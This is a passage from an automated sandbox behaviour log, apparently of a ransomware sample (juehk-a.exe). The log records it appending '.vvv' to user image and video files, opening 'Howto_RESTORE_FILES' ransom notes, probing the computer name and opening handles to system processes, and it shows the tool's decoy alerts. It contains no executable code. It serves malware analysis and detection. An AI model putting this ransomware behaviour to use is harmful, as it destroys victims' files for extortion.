37636.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37637.          old_name: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
37638.          new_name: C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.vvv
37639.            ads:
37640.          fid (ads:): 281474976726993
37641.          ntstatus: 0x0
37642.          CreateOptions: 0x0
37643.        file:
37644.          timestamp: 213753
37645.          mode: rename
37646.          sequenceNumber: 2630
37647.          filesize: 781246
37648.          processinfo:
37649.            pid: 1648
37650.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37651.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37652.          old_name: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
37653.          new_name: C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.vvv
37654.            ads:
37655.          fid (ads:): 281474976726995
37656.          ntstatus: 0x0
37657.          CreateOptions: 0x0
37658.        file:
37659.          timestamp: 213791
37660.          mode: rename
37661.          sequenceNumber: 2631
37662.          filesize: 561694
37663.          processinfo:
37664.            pid: 1648
37665.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37666.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37667.          old_name: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
37668.          new_name: C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.vvv
37669.            ads:
37670.          fid (ads:): 281474976726997
37671.          ntstatus: 0x0
37672.          CreateOptions: 0x0
37673.        file:
37674.          timestamp: 213826
37675.          mode: rename
37676.          sequenceNumber: 2632
37677.          filesize: 778254
37678.          processinfo:
37679.            pid: 1648
37680.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37681.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37682.          old_name: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
37683.          new_name: C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.vvv
37684.            ads:
37685.          fid (ads:): 281474976726999
37686.          ntstatus: 0x0
37687.          CreateOptions: 0x0
37688.        file:
37689.          timestamp: 213875
37690.          mode: rename
37691.          sequenceNumber: 2633
37692.          filesize: 621310
37693.          processinfo:
37694.            pid: 1648
37695.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37696.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37697.          old_name: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
37698.          new_name: C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.vvv
37699.            ads:
37700.          fid (ads:): 281474976727001
37701.          ntstatus: 0x0
37702.          CreateOptions: 0x0
37703.        file:
37704.          timestamp: 214933
37705.          mode: rename
37706.          sequenceNumber: 2634
37707.          filesize: 26246446
37708.          processinfo:
37709.            pid: 1648
37710.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37711.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37712.          old_name: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
37713.          new_name: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.vvv
37714.            ads:
37715.          fid (ads:): 281474976727011
37716.          ntstatus: 0x0
37717.          CreateOptions: 0x0
37718.        apicall:
37719.          timestamp: 215108
37720.          sequenceNumber: 2635
37721.          processinfo:
37722.            pid: 1648
37723.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37724.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37725.          dllname: kernel32.dll
37726.          apiname: GetComputerNameW
37727.          address: 0x71fba425
37728.          params:
37729.            param (id:1): 0x799bd8
37730.            param (id:2): 0x2c8f8d8
37731.        regkey:
37732.          randomized: true
37733.          mode: queryvalue
37734.          sequenceNumber: 2636
37735.          timestamp: 215112
37736.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
37737.           processinfo:
37738.             pid: 1648
37739.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37740.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37741.         apicall:
37742.           timestamp: 215199
37743.           sequenceNumber: 2637
37744.           processinfo:
37745.             pid: 1648
37746.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37747.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37748.           dllname: kernel32.dll
37749.           apiname: GetComputerNameExW
37750.           address: 0x71f638b7
37751.           params:
37752.             param (id:1): 0
37753.             param (id:2): 0x563f10
37754.             param (id:3): 0x2c8f790
37755.         apicall:
37756.           timestamp: 215318
37757.           sequenceNumber: 2638
37758.           processinfo:
37759.             pid: 1648
37760.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37761.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37762.           dllname: kernel32.dll
37763.           apiname: GetComputerNameExW
37764.           address: 0x71f638b7
37765.           params:
37766.             param (id:1): 0
37767.             param (id:2): 0x563f38
37768.             param (id:3): 0x2c8f778
37769.         apicall:
37770.           timestamp: 215318
37771.           sequenceNumber: 2639
37772.           processinfo:
37773.             pid: 1648
37774.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37775.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37776.           dllname: kernel32.dll
37777.           apiname: GetComputerNameExW
37778.           address: 0x71f638b7
37779.           params:
37780.             param (id:1): 0
37781.             param (id:2): 0x563f10
37782.             param (id:3): 0x2c8f778
37783.         apicall:
37784.           timestamp: 215339
37785.           sequenceNumber: 2640
37786.           processinfo:
37787.             pid: 1648
37788.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37789.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37790.           dllname: Shell32.dll
37791.           apiname: ShellExecuteW
37792.           address: 0x0041f497
37793.           params:
37794.             param (id:1): 0x0
37795.             param (id:2): open
37796.             param (id:3): C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.txt
37797.             param (id:4): NULL
37798.             param (id:5): NULL
37799.             param (id:6): 1
37800.         process:
37801.           timestamp: 215531
37802.           mode: opened
37803.           sequenceNumber: 2641
37804.           desiredaccess: 0x02000030
37805.           ntstatus: 0x00000000
37806.           target:
37807.             processinfo:
37808.               pid: 2384
37809.               tid: 0
37810.               imagepath: N\AB
37811.           source:
37812.             processinfo:
37813.               pid: 1648
37814.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37815.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37816.         process:
37817.           timestamp: 215543
37818.           mode: started
37819.           sequenceNumber: 2642
37820.           value: C:\Windows\SysWOW64\notepad.exe
37821.           pid: 2384
37822.           ppid: 1648
37823.           parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37824.           cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.txt
37825.           filesize: N/A
37826.           md5sum: d378bffb70923139d6a4f546864aa61c
37827.           sha1sum: N/A
37828.             ads:
37829.           fid (ads:): 281474976748820
37830.         malicious-alert:
37831.           classtype: Decoy-Activity
37832.           weight: 0
37833.           ruleid: 6600 : Decoy Application Started ; Decoy Application Started
37834.           msg: Decoy Application Started
37835.           display-msg: Decoy Application Started
37836.         malicious-alert:
37837.           classtype: misc-anom
37838.           weight: 100
37839.           ruleid: 10095 : Suspicious Decoy Activity ; Suspicious Decoy Activity
37840.           msg: Suspicious Decoy Activity
37841.           display-msg: Suspicious Decoy Activity
37842.         process:
37843.           timestamp: 215551
37844.           mode: opened
37845.           sequenceNumber: 2643
37846.           desiredaccess: 0x02000030
37847.           ntstatus: 0x00000000
37848.           target:
37849.             processinfo:
37850.               pid: 2384
37851.               imagepath: C:\Windows\SysWOW64\notepad.exe
37852.               md5sum: d378bffb70923139d6a4f546864aa61c
37853.           source:
37854.             processinfo:
37855.               pid: 1648
37856.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37857.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37858.         process:
37859.           timestamp: 215557
37860.           mode: opened
37861.           sequenceNumber: 2644
37862.           desiredaccess: 0x02000030
37863.           ntstatus: 0x00000000
37864.           target:
37865.             processinfo:
37866.               pid: 2384
37867.               imagepath: C:\Windows\SysWOW64\notepad.exe
37868.               md5sum: d378bffb70923139d6a4f546864aa61c
37869.           source:
37870.             processinfo:
37871.               pid: 1648
37872.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37873.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37874.         process:
37875.           timestamp: 215563
37876.           mode: opened
37877.           sequenceNumber: 2645
37878.           desiredaccess: 0x02000030
37879.           ntstatus: 0x00000000
37880.           target:
37881.             processinfo:
37882.               pid: 2384
37883.               imagepath: C:\Windows\SysWOW64\notepad.exe
37884.               md5sum: d378bffb70923139d6a4f546864aa61c
37885.           source:
37886.             processinfo:
37887.               pid: 1648
37888.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37889.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37890.         high_cpu:
37891.           timestamp: 215958
37892.           sequenceNumber: 2646
37893.           total_cpu: 63.63613053613053
37894.           processinfo:
37895.             tainted: true
37896.             pid: 2312
37897.             process_cpu: 63.63613053613053
37898.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
37899.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37900.         apicall:
37901.           timestamp: 216364
37902.           sequenceNumber: 2647
37903.           processinfo:
37904.             pid: 1648
37905.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37906.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37907.           dllname: Shell32.dll
37908.           apiname: ShellExecuteW
37909.           address: 0x0041f497
37910.           params:
37911.             param (id:1): 0x0
37912.             param (id:2): open
37913.             param (id:3): C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.html
37914.             param (id:4): NULL
37915.             param (id:5): NULL
37916.             param (id:6): 1
37917.         file:
37918.           timestamp: 216570
37919.           mode: failed
37920.           sequenceNumber: 2648
37921.           value: C:\Windows\System32\WOW64LOG.DLL
37922.           processinfo:
37923.             tainted: true
37924.             pid: 2384
37925.             imagepath: C:\Windows\SysWOW64\notepad.exe
37926.             md5sum: d378bffb70923139d6a4f546864aa61c
37927.             ads:
37928.           fid (ads:): 0
37929.           failure: open
37930.           ntstatus: 0xc0000034
37931.           CreateOptions: 0x200000
37932.           PE:
37933.             InspectionType: Ext
37934.         regkey:
37935.           randomized: true
37936.           mode: queryvalue
37937.           sequenceNumber: 2649
37938.           timestamp: 216850
37939.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
37940.          processinfo:
37941.            pid: 2384
37942.            imagepath: C:\Windows\SysWOW64\notepad.exe
37943.            md5sum: d378bffb70923139d6a4f546864aa61c
37944.        file:
37945.          timestamp: 217030
37946.          mode: failed
37947.          sequenceNumber: 2650
37948.          value: C:\Windows\SysWOW64\RPCSS.DLL
37949.          processinfo:
37950.            tainted: true
37951.            pid: 2384
37952.            imagepath: C:\Windows\SysWOW64\notepad.exe
37953.            md5sum: d378bffb70923139d6a4f546864aa61c
37954.            ads:
37955.          fid (ads:): 0
37956.          failure: open
37957.          ntstatus: 0xc0000034
37958.          CreateOptions: 0x200000
37959.          PE:
37960.            InspectionType: Ext
37961.        regkey:
37962.          timestamp: 217082
37963.          mode: setval
37964.          sequenceNumber: 2651
37965.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\"{17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF" = 01 00 00 00 00 00 00 00 20 21 50 5b 20 2f d1 01
37966.           processinfo:
37967.             pid: 1648
37968.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37969.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37970.         apicall:
37971.           timestamp: 217489
37972.           sequenceNumber: 2652
37973.           processinfo:
37974.             pid: 1648
37975.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37976.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37977.           dllname: user32.dll
37978.           apiname: FindWindowExW
37979.           address: 0x74ac8d12
37980.           params:
37981.             param (id:1): 0x0
37982.             param (id:2): 0x0
37983.             param (id:3): IEFrame
37984.             param (id:4): NULL
37985.         apicall:
37986.           timestamp: 217493
37987.           sequenceNumber: 2653
37988.           processinfo:
37989.             pid: 1648
37990.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
37991.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
37992.           dllname: user32.dll
37993.           apiname: FindWindowExW
37994.           address: 0x74ac8d12
37995.           params:
37996.             param (id:1): 0x0
37997.             param (id:2): 0x10212
37998.             param (id:3): IEFrame
37999.             param (id:4): NULL
38000.         new-dialog-popup:
38001.           timestamp: 217747
38002.           sequenceNumber: 2654
38003.           processinfo:
38004.             pid: 2384
38005.             imagepath: C:\Windows\SysWOW64\notepad.exe
38006.           hwnd: 0x002002B8
38007.           title: Howto_RESTORE_FILES - Notepad
38008.           window-class: Notepad
38009.           size-width: 768
38010.           size-height: 556
38011.           position-x: 150
38012.           position-y: 150
38013.           visible: true
38014.           topmost: false
38015.           text-fields:
38016.             text-field (id:1): Howto_RESTORE_FILES - Notepad
38017.         apicall:
38018.           timestamp: 217761
38019.           sequenceNumber: 2655
38020.           processinfo:
38021.             pid: 1648
38022.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38023.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38024.           dllname: user32.dll
38025.           apiname: FindWindowExW
38026.           address: 0x74ac8bfa
38027.           params:
38028.             param (id:1): 0x0
38029.             param (id:2): 0x0
38030.             param (id:3): IEFrame
38031.             param (id:4): NULL
38032.         apicall:
38033.           timestamp: 217761
38034.           sequenceNumber: 2656
38035.           processinfo:
38036.             pid: 1648
38037.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38038.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38039.           dllname: user32.dll
38040.           apiname: FindWindowExW
38041.           address: 0x74ac8bfa
38042.           params:
38043.             param (id:1): 0x0
38044.             param (id:2): 0x10212
38045.             param (id:3): IEFrame
38046.             param (id:4): NULL
38047.         apicall:
38048.           timestamp: 217761
38049.           sequenceNumber: 2657
38050.           processinfo:
38051.             pid: 1648
38052.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38053.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38054.           dllname: user32.dll
38055.           apiname: FindWindowExW
38056.           address: 0x74ac8bfa
38057.           params:
38058.             param (id:1): 0x0
38059.             param (id:2): 0x10186
38060.             param (id:3): IEFrame
38061.             param (id:4): NULL
38062.         apicall:
38063.           timestamp: 217762
38064.           sequenceNumber: 2658
38065.           processinfo:
38066.             pid: 1648
38067.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38068.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38069.           dllname: user32.dll
38070.           apiname: FindWindowExW
38071.           address: 0x74ac8bfa
38072.           params:
38073.             param (id:1): 0x0
38074.             param (id:2): 0x2009e
38075.             param (id:3): IEFrame
38076.             param (id:4): NULL
38077.         apicall:
38078.           timestamp: 217939
38079.           repeat: 60000
38080.           sequenceNumber: 2659
38081.           processinfo:
38082.             pid: 1648
38083.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38084.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38085.           dllname: kernel32.dll
38086.           apiname: Sleep
38087.           address: 0x0041ed5b
38088.         process:
38089.           timestamp: 218014
38090.           mode: opened
38091.           sequenceNumber: 2660
38092.           desiredaccess: 0x02000030
38093.           ntstatus: 0xc0000022
38094.           target:
38095.             processinfo:
38096.               pid: 4
38097.               tid: 0
38098.               imagepath: N/A
38099.           source:
38100.             processinfo:
38101.               pid: 1648
38102.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38103.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38104.         apicall:
38105.           timestamp: 218410
38106.           sequenceNumber: 2661
38107.           processinfo:
38108.             pid: 1648
38109.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38110.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38111.           dllname: Shell32.dll
38112.           apiname: ShellExecuteW
38113.           address: 0x0041f497
38114.           params:
38115.             param (id:1): 0x0
38116.             param (id:2): open
38117.             param (id:3): C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.bmp
38118.             param (id:4): NULL
38119.             param (id:5): NULL
38120.             param (id:6): 1
38121.         process:
38122.           timestamp: 218806
38123.           mode: opened
38124.           sequenceNumber: 2662
38125.           desiredaccess: 0x02000030
38126.           ntstatus: 0x00000000
38127.           target:
38128.             processinfo:
38129.               pid: 2308
38130.               imagepath: C:\Windows\System32\svchost.exe
38131.               md5sum: c78655bc80301d76ed4fef1c1ea40a7d
38132.           source:
38133.             processinfo:
38134.               pid: 1648
38135.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38136.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38137.         process:
38138.           timestamp: 218811
38139.           mode: opened
38140.           sequenceNumber: 2663
38141.           desiredaccess: 0x02000030
38142.           ntstatus: 0x00000000
38143.           target:
38144.             processinfo:
38145.               pid: 2308
38146.               imagepath: C:\Windows\System32\svchost.exe
38147.               md5sum: c78655bc80301d76ed4fef1c1ea40a7d
38148.           source:
38149.             processinfo:
38150.               pid: 1648
38151.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38152.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38153.         process:
38154.           timestamp: 218816
38155.           mode: opened
38156.           sequenceNumber: 2664
38157.           desiredaccess: 0x02000030
38158.           ntstatus: 0x00000000
38159.           target:
38160.             processinfo:
38161.               pid: 2308
38162.               imagepath: C:\Windows\System32\svchost.exe
38163.               md5sum: c78655bc80301d76ed4fef1c1ea40a7d
38164.           source:
38165.             processinfo:
38166.               pid: 1648
38167.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38168.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38169.         process:
38170.           timestamp: 218821
38171.           mode: opened
38172.           sequenceNumber: 2665
38173.           desiredaccess: 0x02000030
38174.           ntstatus: 0x00000000
38175.           target:
38176.             processinfo:
38177.               pid: 2308
38178.               imagepath: C:\Windows\System32\svchost.exe
38179.               md5sum: c78655bc80301d76ed4fef1c1ea40a7d
38180.           source:
38181.             processinfo:
38182.               pid: 1648
38183.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38184.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38185.         regkey:
38186.           timestamp: 219088
38187.           mode: setval
38188.           sequenceNumber: 2666
38189.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\"{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF" = 01 00 00 00 00 00 00 00 20 fd cc 5c 20 2f d1 01
38190.          processinfo:
38191.            pid: 1648
38192.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38193.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38194.        process:
38195.          timestamp: 220863
38196.          mode: opened
38197.          sequenceNumber: 2667
38198.          desiredaccess: 0x02000030
38199.          ntstatus: 0x00000000
38200.          target:
38201.            processinfo:
38202.              pid: 2028
38203.              tid: 0
38204.              imagepath: N\AB
38205.          source:
38206.            processinfo:
38207.              pid: 1648
38208.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38209.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38210.        process:
38211.          timestamp: 220869
38212.          mode: opened
38213.          sequenceNumber: 2668
38214.          desiredaccess: 0x02000030
38215.          ntstatus: 0x00000000
38216.          target:
38217.            processinfo:
38218.              pid: 2028
38219.              tid: 0
38220.              imagepath: N\AB
38221.          source:
38222.            processinfo:
38223.              pid: 1648
38224.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38225.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38226.        process:
38227.          timestamp: 220904
38228.          mode: opened
38229.          sequenceNumber: 2669
38230.          desiredaccess: 0x02000030
38231.          ntstatus: 0x00000000
38232.          target:
38233.            processinfo:
38234.              pid: 2028
38235.              imagepath: C:\Windows\SysWOW64\WerFault.exe
38236.              md5sum: 5feab868caedbbd1b7a145ca8261e4aa
38237.          source:
38238.            processinfo:
38239.              pid: 1648
38240.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38241.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38242.        process:
38243.          timestamp: 220918
38244.          mode: opened
38245.          sequenceNumber: 2670
38246.          desiredaccess: 0x02000030
38247.          ntstatus: 0x00000000
38248.          target:
38249.            processinfo:
38250.              pid: 2028
38251.              imagepath: C:\Windows\SysWOW64\WerFault.exe
38252.              md5sum: 5feab868caedbbd1b7a145ca8261e4aa
38253.          source:
38254.            processinfo:
38255.              pid: 1648
38256.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38257.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38258.        regkey:
38259.          timestamp: 220997
38260.          mode: setval
38261.          sequenceNumber: 2671
38262.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Direct3D\MostRecentApplication\"Name" = juehk-a.exe
38263.           processinfo:
38264.             pid: 1648
38265.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38266.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38267.         uac:
38268.           timestamp: 221327
38269.           mode: service
38270.           sequenceNumber: 2672
38271.           value: Windows Error Reporting Service
38272.           status: running
38273.         process:
38274.           timestamp: 221900
38275.           mode: opened
38276.           sequenceNumber: 2673
38277.           desiredaccess: 0x02000030
38278.           ntstatus: 0x00000000
38279.           target:
38280.             processinfo:
38281.               pid: 2512
38282.               imagepath: C:\Windows\SysWOW64\dllhost.exe
38283.               md5sum: a63dc5c2ea944e6657203e0c8edeaf61
38284.           source:
38285.             processinfo:
38286.               pid: 1648
38287.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38288.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38289.         process:
38290.           timestamp: 221907
38291.           mode: opened
38292.           sequenceNumber: 2674
38293.           desiredaccess: 0x02000030
38294.           ntstatus: 0x00000000
38295.           target:
38296.             processinfo:
38297.               pid: 2512
38298.               imagepath: C:\Windows\SysWOW64\dllhost.exe
38299.               md5sum: a63dc5c2ea944e6657203e0c8edeaf61
38300.           source:
38301.             processinfo:
38302.               pid: 1648
38303.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38304.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38305.         process:
38306.           timestamp: 221913
38307.           mode: opened
38308.           sequenceNumber: 2675
38309.           desiredaccess: 0x02000030
38310.           ntstatus: 0x00000000
38311.           target:
38312.             processinfo:
38313.               pid: 2512
38314.               imagepath: C:\Windows\SysWOW64\dllhost.exe
38315.               md5sum: a63dc5c2ea944e6657203e0c8edeaf61
38316.           source:
38317.             processinfo:
38318.               pid: 1648
38319.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38320.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38321.         process:
38322.           timestamp: 221919
38323.           mode: opened
38324.           sequenceNumber: 2676
38325.           desiredaccess: 0x02000030
38326.           ntstatus: 0x00000000
38327.           target:
38328.             processinfo:
38329.               pid: 2512
38330.               imagepath: C:\Windows\SysWOW64\dllhost.exe
38331.               md5sum: a63dc5c2ea944e6657203e0c8edeaf61
38332.           source:
38333.             processinfo:
38334.               pid: 1648
38335.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38336.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38337.         process:
38338.           timestamp: 222414
38339.           mode: opened
38340.           sequenceNumber: 2677
38341.           desiredaccess: 0x02000030
38342.           ntstatus: 0x00000000
38343.           target:
38344.             processinfo:
38345.               pid: 1728
38346.               imagepath: C:\Windows\System32\conhost.exe
38347.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38348.           source:
38349.             processinfo:
38350.               pid: 1648
38351.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38352.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38353.         process:
38354.           timestamp: 222420
38355.           mode: opened
38356.           sequenceNumber: 2678
38357.           desiredaccess: 0x02000030
38358.           ntstatus: 0x00000000
38359.           target:
38360.             processinfo:
38361.               pid: 1728
38362.               imagepath: C:\Windows\System32\conhost.exe
38363.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38364.           source:
38365.             processinfo:
38366.               pid: 1648
38367.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38368.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38369.         process:
38370.           timestamp: 222467
38371.           mode: opened
38372.           sequenceNumber: 2679
38373.           desiredaccess: 0x02000030
38374.           ntstatus: 0x00000000
38375.           target:
38376.             processinfo:
38377.               pid: 1728
38378.               imagepath: C:\Program Files (x86)\Debugging Tools for Windows (x86)\cdb.exe
38379.               md5sum: 7e45b80edb9e3facb344aae59eb09c18
38380.           source:
38381.             processinfo:
38382.               pid: 1648
38383.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38384.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38385.         process:
38386.           timestamp: 222473
38387.           mode: opened
38388.           sequenceNumber: 2680
38389.           desiredaccess: 0x02000030
38390.           ntstatus: 0x00000000
38391.           target:
38392.             processinfo:
38393.               pid: 1728
38394.               imagepath: C:\Program Files (x86)\Debugging Tools for Windows (x86)\cdb.exe
38395.               md5sum: 7e45b80edb9e3facb344aae59eb09c18
38396.           source:
38397.             processinfo:
38398.               pid: 1648
38399.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38400.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38401.         process:
38402.           timestamp: 222935
38403.           mode: opened
38404.           sequenceNumber: 2681
38405.           desiredaccess: 0x02000030
38406.           ntstatus: 0x00000000
38407.           target:
38408.             processinfo:
38409.               pid: 2824
38410.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38411.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38412.           source:
38413.             processinfo:
38414.               pid: 1648
38415.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38416.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38417.         process:
38418.           timestamp: 222942
38419.           mode: opened
38420.           sequenceNumber: 2682
38421.           desiredaccess: 0x02000030
38422.           ntstatus: 0x00000000
38423.           target:
38424.             processinfo:
38425.               pid: 2824
38426.               imagepath: C:\Windows\System32\conhost.exe
38427.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38428.           source:
38429.             processinfo:
38430.               pid: 1648
38431.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38432.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38433.         process:
38434.           timestamp: 222948
38435.           mode: opened
38436.           sequenceNumber: 2683
38437.           desiredaccess: 0x02000030
38438.           ntstatus: 0x00000000
38439.           target:
38440.             processinfo:
38441.               pid: 2824
38442.               imagepath: C:\Windows\System32\conhost.exe
38443.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38444.           source:
38445.             processinfo:
38446.               pid: 1648
38447.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38448.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38449.         process:
38450.           timestamp: 222990
38451.           mode: opened
38452.           sequenceNumber: 2684
38453.           desiredaccess: 0x02000030
38454.           ntstatus: 0x00000000
38455.           target:
38456.             processinfo:
38457.               pid: 2824
38458.               imagepath: C:\Windows\System32\conhost.exe
38459.               md5sum: 402b44b31c7183fcf2c4e1083af317fa
38460.           source:
38461.             processinfo:
38462.               pid: 1648
38463.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38464.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38465.         process:
38466.           timestamp: 223837
38467.           mode: opened
38468.           sequenceNumber: 2685
38469.           desiredaccess: 0x02000030
38470.           ntstatus: 0x00000000
38471.           target:
38472.             processinfo:
38473.               pid: 2804
38474.               imagepath: C:\Windows\System32\dllhost.exe
38475.               md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
38476.           source:
38477.             processinfo:
38478.               pid: 1648
38479.               imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
38480.               md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
38481.         process:
38482.           timestamp: 223843
38483.           mode: opened
38484.           sequenceNumber: 2686
38485.           desiredaccess: 0x02000030
38486.           ntstatus: 0x00000000
38487.           target:
38488.             processinfo:
38489.               pid: 2804
38490.               imagepath: C:\Windows\System32\dllhost.exe
